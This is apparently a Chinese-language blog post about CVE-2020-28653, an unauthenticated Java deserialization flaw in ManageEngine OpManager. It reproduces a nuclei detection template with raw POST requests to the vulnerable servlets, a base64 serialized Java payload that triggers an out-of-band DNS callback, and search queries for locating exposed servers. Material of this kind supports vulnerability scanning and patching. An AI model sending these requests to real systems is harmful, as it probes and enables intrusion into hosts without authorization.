ManageEngine OpManager SumPDU Java Deserialization Vulnerability

漏洞信息

漏洞名称: ManageEngine OpManager SumPDU Java Deserialization Vulnerability

漏洞编号:

  • CVE: CVE-2020-28653

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: ManageEngine OpManager是一款广泛使用的网络监控和管理软件,适用于企业环境,能够提供全面的网络性能监控、故障管理和配置管理功能。该软件广泛应用于各种规模的组织中,以实现对网络设备和服务的实时监控和管理。

该漏洞存在于ManageEngine OpManager的Smart Update Manager组件中,具体为一个HTTP端点,可以被利用来反序列化任意Java对象。由于缺乏适当的输入验证,未经身份验证的远程攻击者可以利用此漏洞在OpManager应用程序的上下文中执行操作系统命令(在Windows上为NT AUTHORITY\SYSTEM,在Linux上为root)。这种类型的漏洞属于反序列化漏洞,其技术根源在于应用程序在处理序列化对象时未进行严格的安全检查。

此漏洞的影响极为严重,因为它允许攻击者在受影响的系统上执行任意代码,可能导致完全的系统接管。由于攻击者无需任何身份验证即可利用此漏洞,因此其利用门槛较低,风险极高。此外,由于OpManager通常部署在内网环境中,一旦被利用,攻击者可能进一步渗透到内部网络,造成更广泛的安全威胁。

产品厂商: zohocorp

产品名称: ManageEngine OpManager

影响版本: 12.1 - 12.5.232

搜索语法: title=”opmanager plus” OR title=”opmanager”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/00c05f4901ae712b72d1d99b90e3d1fd53317ffe/http%2Fcves%2F2020%2FCVE-2020-28653.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79

id: CVE-2020-28653

info:
  name: ManageEngine OpManager SumPDU 12.1 - 12.5.232 - Java Deserialization
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to
    deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS
    commands in the context of the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This
    vulnerability is also present in other products that are built on top of the OpManager application. This
    vulnerability affects OpManager versions 12.1 - 12.5.232.
  reference:
    - http://packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html
    - https://github.com/AdeliaNitzsche/Java-Deserialization-Cheat-Sheet
    - https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
    - https://github.com/HimmelAward/Goby_POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28653
    epss-score: 0.80604
    epss-percentile: 0.99072
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  metadata:
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query:
      - http.title:"opmanager plus"
      - http.title:"opmanager"
    fofa-query:
      - title="opmanager plus"
      - title="opmanager"
    google-query:
      - intitle:"opmanager plus"
      - intitle:"opmanager"
  tags: packetstorm,java, deserialization, rce, opmanager,demo,intrusive

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',50,'prefix')}}"

http:
  - raw:
      - |+
        POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

  - raw:
      - |-
        POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{base64_decode('rO0ABXcEAAAD6g==')}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - "status_code == 200"

  - raw:
      - |-
        POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{replace(base64_decode('AAABX6ztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXNyAAxqYXZhLm5ldC5VUkyWJTc2GvzkcgMAB0kACGhhc2hDb2RlSQAEcG9ydEwACWF1dGhvcml0eXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABGZpbGVxAH4AA0wABGhvc3RxAH4AA0wACHByb3RvY29scQB+AANMAANyZWZxAH4AA3hw//////////90ADJhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYXQAAHEAfgAFdAAEaHR0cHB4dAA5aHR0cDovL2FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheA=='),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', payload)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'


Github Poc
#projectdiscovery/nuclei-templates:github issues #反序列化
ManageEngine OpManager SumPDU Java Deserialization Vulnerability
http://example.com/2025/07/08/github_1814476453/
作者
lianccc
发布于
2025年7月8日
许可协议